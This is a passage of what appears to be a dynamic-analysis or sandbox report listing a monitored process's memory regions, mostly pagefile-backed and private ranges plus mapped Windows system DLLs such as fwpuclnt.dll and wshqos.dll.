"pagefile_0x0000000000610000" filename = "" Region: id = 7429 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7430 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 7431 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 7432 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7433 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7434 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7435 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7436 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7437 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7438 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7439 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7440 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7441 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7442 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7443 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7444 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7445 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7446 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7447 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7448 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7449 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7450 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7451 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7452 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7453 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7454 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7455 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7456 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7457 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7458 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7459 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7460 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7461 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7462 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7463 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7464 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7465 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7466 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7467 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7468 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7469 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7470 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7471 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7472 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7473 start_va = 0x7ffa0b640000 end_va = 0x7ffa0b6a6fff monitored = 0 entry_point = 0x7ffa0b6463e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 7474 start_va = 0x610000 end_va = 0x619fff monitored = 0 entry_point = 0x6115c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 7475 start_va = 0x1e80000 end_va = 0x1e80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\System32\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshqos.dll.mui") Region: id = 7476 start_va = 0x610000 end_va = 0x619fff monitored = 0 entry_point = 0x6115c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 7477 start_va = 0x1e80000 end_va = 0x1e80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\System32\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshqos.dll.mui") Region: id = 7478 start_va = 0x610000 end_va = 0x619fff monitored = 0 entry_point = 0x6115c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 7479 start_va = 0x1e80000 end_va = 0x1e80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\System32\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshqos.dll.mui") Region: id = 7480 start_va = 0x610000 end_va = 0x619fff monitored = 0 entry_point = 0x6115c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 7481 start_va = 0x1e80000 end_va = 0x1e80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\System32\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshqos.dll.mui") Region: id = 7482 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 7483 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 7484 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7485 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7486 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7487 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 7488 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 7489 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7490 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7491 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7492 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7493 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7494 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7495 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7496 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7497 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7498 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7499 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7500 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7501 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7502 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7503 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7504 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7505 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7506 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7507 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7508 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7509 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7510 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7511 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7512 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7513 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7514 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7515 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7516 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7517 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7518 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7519 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7520 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7521 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7522 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7523 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7524 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7525 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7526 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7527 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7528 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7529 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7530 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7531 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7532 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7533 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7534 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7535 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7536 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7537 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7538 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7539 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7540 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 7541 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 7542 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7543 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7544 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7545 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7546 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7547 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7548 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7549 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7550 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7551 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7552 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7553 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7554 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7555 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7556 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7557 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7558 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7559 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7560 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7561 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7562 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7563 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7564 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7565 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7566 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7567 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7568 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7569 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7570 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7571 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7572 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7573 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7574 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7575 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7576 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7577 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7578 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7579 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7580 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7581 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7582 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7583 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7584 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7585 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7586 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7587 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7588 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7589 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7590 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7591 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7592 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7593 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7594 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7595 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7596 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 7597 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 7598 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7599 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7600 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 7601 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 7602 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7603 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7604 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7605 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7606 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7607 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7608 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7609 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7610 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7611 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 